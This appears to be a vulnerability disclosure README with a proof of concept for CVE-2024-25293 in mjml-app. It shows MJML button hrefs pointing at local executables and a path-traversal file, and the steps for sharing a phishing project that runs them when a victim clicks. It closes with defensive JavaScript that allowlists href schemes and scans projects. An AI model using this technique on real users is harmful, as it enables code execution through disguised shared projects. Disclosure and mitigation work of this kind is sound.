A proof of concept for the CVE-2024-25293 vulnerability.
mjml-app v3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) vulnerability.
This repository contains an example vulnerable application and a proof-of-concept (PoC) exploit for it.
- Vulnerability Subject: Local Code Execution
- Vulnerability Version: mjml-app 3.0.4-win & mjml-app 3.1.0-beta
- Attack Type: Remote Code Execution
- Attack Component: In the 'mj-button' tag within the affected source code file, the 'href' attribute enables local code execution.
- Reserved CVE Number: CVE-2024-25293
- mjml-app 3.0.4-win and mjml-app 3.1.0-beta suffer from a security misconfiguration in the 'mj-button' tag, which can result in arbitrary code execution.
- Exploit explanation

Step 1) The attacker creates an 'mj-button' whose 'href' attribute points at a local file, for example:
  - case 1) Code execution with path traversal (notepad.exe)
  - case 2) Code execution (calc.exe)
```xml
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>
```
Step 2) The attacker creates the main phishing project with the following code.
```xml
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
```

```xml
<!-- main.mjml -->
<mj-include path="./index.mjml" />
```
Step 3) The victim opens the shared project and clicks the button, triggering execution of the payload (e.g. calc.exe or notepad.exe).

Executing local files through 'href' attributes inside an application is dangerous, and doing so in combination with path traversal is a serious security concern: it allows phishing projects to be created and shared so that local files execute when a button is clicked. The feature therefore needs to be changed so that such execution is prevented.
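The fix the previous paragraph calls for is an allowlist on the href before the application hands it to the operating system. The JavaScript below is an added example written for this README; it is not code from this repository or from mjml-app. It assumes the application opens hrefs through some "open externally" call (the page does not say which API mjml-app uses, so `openExternal` is a stand-in), and it pairs the guard with a scanner that reviews a received project for button hrefs the guard would block. The sample MJML is constructed from the template shown above, with one ordinary https link added for contrast.

```javascript
// Added example (not code from this repository or from mjml-app): an allowlist
// check for mj-button href values, plus a scanner that reviews an MJML project
// for hrefs the allowlist would reject. How mjml-app actually opens an href is
// not stated on this page; `openExternal` below is an assumed stand-in.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// True only for absolute URLs whose scheme is allowlisted. Drive-letter paths
// such as "C:\Users\..." parse with the one-letter scheme "c:", "file:" URLs
// parse with "file:", and relative or UNC paths fail to parse at all; every one
// of those is rejected, so a local file can never be reached through a button.
// An allowlist is used rather than a denylist precisely because "C:" is a
// syntactically valid scheme and would slip past a check that only looks for
// "file:".
function isSafeHref(href) {
  if (typeof href !== "string") return false;
  const trimmed = href.trim();
  if (trimmed === "") return false;
  let url;
  try {
    url = new URL(trimmed);
  } catch {
    return false; // relative paths, UNC paths, malformed input
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Guarded opener: refuses anything the allowlist rejects and reports why,
// instead of handing the raw string to the operating system.
function openButtonHref(href, openExternal) {
  if (!isSafeHref(href)) {
    return { opened: false, reason: `blocked mj-button href: ${href}` };
  }
  openExternal(href);
  return { opened: true, reason: null };
}

// Pre-open review of a received project: returns every mj-button href that
// would be blocked, so a reviewer or a CI check can flag a phishing template
// before anyone opens it in the editor.
function findUnsafeButtonHrefs(mjmlSource) {
  const tagRe = /<mj-button\b[^>]*\bhref\s*=\s*(["'])(.*?)\1/gi;
  const unsafe = [];
  let match;
  while ((match = tagRe.exec(mjmlSource)) !== null) {
    if (!isSafeHref(match[2])) unsafe.push(match[2]);
  }
  return unsafe;
}

// Constructed sample built from the template above: the two local-file hrefs
// from the page plus one ordinary https link.
const SAMPLE_MJML = [
  "<mjml><mj-body><mj-section><mj-column>",
  '<mj-button background-color="#f45e43" color="white" href="C:\\Users\\EQST\\Desktop\\jruru\\..\\jruru_hacked.txt"> jruru </mj-button>',
  '<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>',
  '<mj-button background-color="#f45e43" color="white" href="https://example.com/docs"> Docs </mj-button>',
  "</mj-column></mj-section></mj-body></mjml>",
].join("\n");

// Runs the scanner over the sample and then tries to open the first flagged
// href through the guard; the stand-in opener records what actually got opened.
function demo() {
  const opened = [];
  const blocked = findUnsafeButtonHrefs(SAMPLE_MJML);
  const attempt = openButtonHref(blocked[0], (h) => opened.push(h));
  console.log("blocked hrefs:", blocked);
  console.log("open attempt:", attempt, "opened:", opened);
  return { blocked, attempt, opened };
}

demo();
```

Running the block prints the two local-file hrefs as blocked and shows that the guarded opener never called `openExternal` for them; only the https link passes. The scanner uses a plain regular expression rather than a full MJML parser, which is enough for a review check but would need the real parser if the project relied on `mj-include` to pull button markup in from other files.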